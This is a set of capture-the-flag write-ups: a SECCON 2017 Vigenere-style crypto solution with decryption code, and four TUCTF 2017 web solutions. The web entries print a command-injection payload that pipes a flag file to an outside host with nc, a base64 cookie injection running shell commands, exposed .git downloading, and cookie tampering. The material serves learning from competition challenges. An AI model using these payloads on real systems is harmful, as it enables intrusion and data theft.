Solution to SECCON 2017 Vigenere3d

10/12/17 — capitol

fractal

name: Vigenere3d

category: crypto

points: 100

Writeup

We got a python program:

import sys
def _l(idx, s):
    return s[idx:] + s[:idx]
def main(p, k1, k2):
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    t = [[_l((i+j) % len(s), s) for j in range(len(s))] for i in range(len(s))]
    i1 = 0
    i2 = 0
    c = ""
    for a in p:
        c += t[s.find(a)][s.find(k1[i1])][s.find(k2[i2])]
        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)
    return c
print main(sys.argv[1], sys.argv[2], sys.argv[2][::-1])

and some example output:

$ python Vigenere3d.py SECCON{**************************} **************
POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9

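Let's call the first argument “flag” and the second “seed”.

Line 2 in the main function creates a three-dimensional lookup table, and as seen in the first line of the for loop, the lookups are based on the flag string, the seed string and the seed string reversed.

Each table entry is t[a][b][c] = s[(a + b + c) % len(s)], so only the sum of the two key characters at each position matters, and we can fix the first of them to 'A'. Since we know 7 characters of the flag, we can calculate the key string like this: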

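    # Assumes s (alphabet) and t (lookup table) from main() above are in scope.
    plain = "SECCON{"
    encry = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"
    # print seed: for each known position, fix the first key character to 'A'
    # (index d) and find the second key character (index e) that maps
    # plain[a] to encry[a]
    for a in range(0, 7):
        for d in range(0, len(s)):
            for e in range(0, len(s)):
                if t[s.find(plain[a])][d][e] == encry[a] and s[d] == 'A':
                    print "%i %c %c" % (a, s[d], s[e])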

which gives us the output:

0 A _
1 A K
2 A P
3 A 2
4 A Z
5 A a
6 A _

Once we know that the seed is AAAAAAA_aZ2PK_ we can calculate the flag with:

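    # print flag: assumes s, t and encry from above are in scope, k1 is the
    # recovered seed, k2 is k1 reversed, and i1 and i2 both start at 0
    for a in range(0, len(encry)):
        # try every plaintext character and keep the one that encrypts to encry[a]
        for d in range(0, len(s)):
            if t[d][s.find(k1[i1])][s.find(k2[i2])] == encry[a]:
                print "%i %c" % (a, s[d])

        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)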

Flag was: SECCON{Welc0me_to_SECCON_CTF_2017}
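The same recovery without building the table, as an added Python 3 example that is not the challenge's or the writeup's own code. It relies on t[a][b][c] = s[(a + b + c) % len(s)] and on the second key being the first one reversed, so the key sum at position i equals the sum at position 13 - i and the 7 known characters fix all 14 positions; the function names and the key length of 14 (taken from the masked seed in the sample invocation) are assumptions of this example.

```python
# Added example (Python 3), not the challenge's or the writeup authors' code.
S = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
N = len(S)  # 65 symbols

# Values copied from the writeup above.
CIPHER = "POR4dnyTLHBfwbxAAZhe}}ocZR3Cxcftw9"
KNOWN_PREFIX = "SECCON{"
KEY_LEN = 14  # assumption: length of the masked seed in the sample invocation


def encrypt(plain, seed):
    """Equivalent to main(plain, seed, seed[::-1]): t[a][b][c] == S[(a+b+c) % N]."""
    rev = seed[::-1]
    out = []
    for i, ch in enumerate(plain):
        j = i % len(seed)
        out.append(S[(S.index(ch) + S.index(seed[j]) + S.index(rev[j])) % N])
    return "".join(out)


def recover_key_sums(known, cipher, key_len):
    """Per-position sums (k1[i] + k2[i]) % N, recovered from a known prefix.

    k2 is k1 reversed, so the sum at i equals the sum at key_len-1-i and
    ceil(key_len / 2) known plaintext characters determine every position.
    """
    half = (key_len + 1) // 2
    if len(known) < half:
        raise ValueError("need at least %d known characters" % half)
    sums = [0] * key_len
    for i in range(half):
        sums[i] = sums[key_len - 1 - i] = (S.index(cipher[i]) - S.index(known[i])) % N
    return sums


def decrypt(cipher, sums):
    """Subtract the key sum at each position, modulo the alphabet size."""
    return "".join(S[(S.index(c) - sums[i % len(sums)]) % N] for i, c in enumerate(cipher))


def equivalent_seed(sums):
    """One seed (even length only) that yields these sums: 'A' * half + tail."""
    if len(sums) % 2:
        raise ValueError("even key length expected")
    half = len(sums) // 2
    return "A" * half + "".join(S[v] for v in sums[half:])


if __name__ == "__main__":
    sums = recover_key_sums(KNOWN_PREFIX, CIPHER, KEY_LEN)
    print(equivalent_seed(sums), decrypt(CIPHER, sums))
```

The recovered seed is only one of many that produce the same ciphertext, since any pair of key characters with the same sum behaves identically.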

Solution to TUCTF 2017 iFrame and Shame

03/12/17 — capitol

arachnid

name: iFrame and Shame

category: web

points: 300

Writeup

We were tired and just pointed Arachni at the page, and it reported that there was OS command injection in the form.

Once we knew that, it was just a question of getting the flag. There was some sort of limit on the number of rows returned, so we just piped the flag to our server with nc.

curl 'http://iframeshame.tuctf.com/' --data 'search=" ; cat flag | nc <ip> <port> ; "&Submit=Submit+Query'

flag was TUCTF{D0nt_Th1nk_H4x0r$_C4nt_3sc4p3_Y0ur_Pr0t3ct10ns}

Solution to TUCTF 2017 Cookie Harrelson

02/12/17 — capitol

tallahassee

name: Cookie Harrelson

category: web

points: 200

Writeup

On accessing the webpage we got this cookie: tallahassee=Y2F0IGluZGV4LnR4dA%3D%3D

Decoding that with base64 revealed that it contained the string: cat index.txt

Playing around with the cookie showed that if we changed it, the string “cat index.txt#” was prepended to the supplied value and sent back.

Based on that we guessed that the server generated the webpage by executing the content of the cookie. We just needed to break out of the comment started by the pound character and we would be able to get the flag. First we did an ls to see that the filename of the flag was flag, and then we got the flag itself.

curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\nls'|base64`"
curl 'http://cookieharrelson.tuctf.com/' -H "Cookie: tallahassee=`echo -e '\ncat flag'|base64`"

Flag was TUCTF{D0nt_3x3cut3_Fr0m_C00k13s}

Solution to TUCTF 2017 Git Gud

01/12/17 — capitol

eyes

name: Git Gud

category: web

points: 100

Writeup

The problem was a single web page with a Git Gud meme. A request to .git showed that the .git repository was included in the deployment. After we had downloaded the repository, it was easy to find the flag in the git reflog.

wget -drc http://gitgud.tuctf.com/.git/
git reflog
git show 08cd273

flag was: TUCTF{D0nt_Us3_G1t_0n_Web_S3rv3r}

Solution to TUCTF 2017 Cookie Duty

30/11/17 — capitol

cookies

name: Cookie Duty

category: web

points: 50

Writeup

We were presented with a page that had a simple form to set a name. The server set a cookie named not_admin to 1 when the form was posted.

To get the flag we simply changed the cookie value to 0 and requested the page again, like this:

curl 'http://cookieduty.tuctf.com/index.php' -H 'Host: cookieduty.tuctf.com' -H 'Cookie: not_admin=0; user=dGVzdA%3D%3D'

flag was TUCTF{D0nt_Sk1p_C00k13_Duty}